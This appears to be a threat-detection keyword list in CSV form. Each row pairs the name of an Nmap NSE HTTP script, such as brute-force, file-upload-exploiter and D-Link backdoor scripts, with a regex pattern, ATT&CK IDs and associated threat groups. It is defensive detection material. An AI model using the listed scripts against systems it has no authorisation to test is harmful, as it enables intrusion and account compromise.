"* http-auth.nse*",".{0,1000}\shttp\-auth\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1452"
"* http-auth-finder.nse*",".{0,1000}\shttp\-auth\-finder\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1453"
"* http-avaya-ipoffice-users.nse*",".{0,1000}\shttp\-avaya\-ipoffice\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1454"
"* http-awstatstotals-exec.nse*",".{0,1000}\shttp\-awstatstotals\-exec\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1455"
"* http-axis2-dir-traversal.nse*",".{0,1000}\shttp\-axis2\-dir\-traversal\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1456"
"* http-backup-finder.nse*",".{0,1000}\shttp\-backup\-finder\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1457"
"* http-barracuda-dir-traversal.nse*",".{0,1000}\shttp\-barracuda\-dir\-traversal\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1458"
"* http-bigip-cookie.nse*",".{0,1000}\shttp\-bigip\-cookie\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1459"
"* http-brute.nse*",".{0,1000}\shttp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1460"
"* http-cakephp-version.nse*",".{0,1000}\shttp\-cakephp\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1461"
"* http-chrono.nse*",".{0,1000}\shttp\-chrono\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1462"
"* http-cisco-anyconnect.nse*",".{0,1000}\shttp\-cisco\-anyconnect\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1463"
"* http-coldfusion-subzero.nse*",".{0,1000}\shttp\-coldfusion\-subzero\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1464"
"* http-comments-displayer.nse*",".{0,1000}\shttp\-comments\-displayer\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1465"
"* http-config-backup.nse*",".{0,1000}\shttp\-config\-backup\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1466"
"* http-cookie-flags.nse*",".{0,1000}\shttp\-cookie\-flags\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1467"
"* http-cors.nse*",".{0,1000}\shttp\-cors\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1468"
"* http-cross-domain-policy.nse*",".{0,1000}\shttp\-cross\-domain\-policy\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1469"
"* http-csrf.nse*",".{0,1000}\shttp\-csrf\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1470"
"* http-date.nse*",".{0,1000}\shttp\-date\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1471"
"* http-default-accounts.nse*",".{0,1000}\shttp\-default\-accounts\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1472"
"* http-devframework.nse*",".{0,1000}\shttp\-devframework\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1473"
"* http-dlink-backdoor.nse*",".{0,1000}\shttp\-dlink\-backdoor\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1474"
"* http-dombased-xss.nse*",".{0,1000}\shttp\-dombased\-xss\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1475"
"* http-domino-enum-passwords.nse*",".{0,1000}\shttp\-domino\-enum\-passwords\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1476"
"* http-drupal-enum.nse*",".{0,1000}\shttp\-drupal\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1477"
"* http-drupal-enum-users.nse*",".{0,1000}\shttp\-drupal\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1478"
"* http-enum.nse*",".{0,1000}\shttp\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1479"
"* http-errors.nse*",".{0,1000}\shttp\-errors\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1480"
"* http-exif-spider.nse*",".{0,1000}\shttp\-exif\-spider\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1481"
"* http-favicon.nse*",".{0,1000}\shttp\-favicon\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1482"
"* http-feed.nse*",".{0,1000}\shttp\-feed\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1483"
"* http-fetch.nse*",".{0,1000}\shttp\-fetch\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1484"
"* http-fileupload-exploiter.nse*",".{0,1000}\shttp\-fileupload\-exploiter\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1485"
"* http-form-brute.nse*",".{0,1000}\shttp\-form\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1486"
"* http-form-fuzzer.nse*",".{0,1000}\shttp\-form\-fuzzer\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1487"
"* http-frontpage-login.nse*",".{0,1000}\shttp\-frontpage\-login\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1488"
"* http-generator.nse*",".{0,1000}\shttp\-generator\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1489"
"* http-git.nse*",".{0,1000}\shttp\-git\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1490"
"* http-gitweb-projects-enum.nse*",".{0,1000}\shttp\-gitweb\-projects\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1491"
"* http-google-malware.nse*",".{0,1000}\shttp\-google\-malware\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1492"
"* http-grep.nse*",".{0,1000}\shttp\-grep\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1493"
"* http-headers.nse*",".{0,1000}\shttp\-headers\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1494"
"* http-hp-ilo-info.nse*",".{0,1000}\shttp\-hp\-ilo\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1495"
"* http-huawei-hg5xx-vuln.nse*",".{0,1000}\shttp\-huawei\-hg5xx\-vuln\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1496"
"* http-icloud-findmyiphone.nse*",".{0,1000}\shttp\-icloud\-findmyiphone\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1497"
"* http-icloud-sendmsg.nse*",".{0,1000}\shttp\-icloud\-sendmsg\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1498"
"* http-iis-short-name-brute.nse*",".{0,1000}\shttp\-iis\-short\-name\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1499"
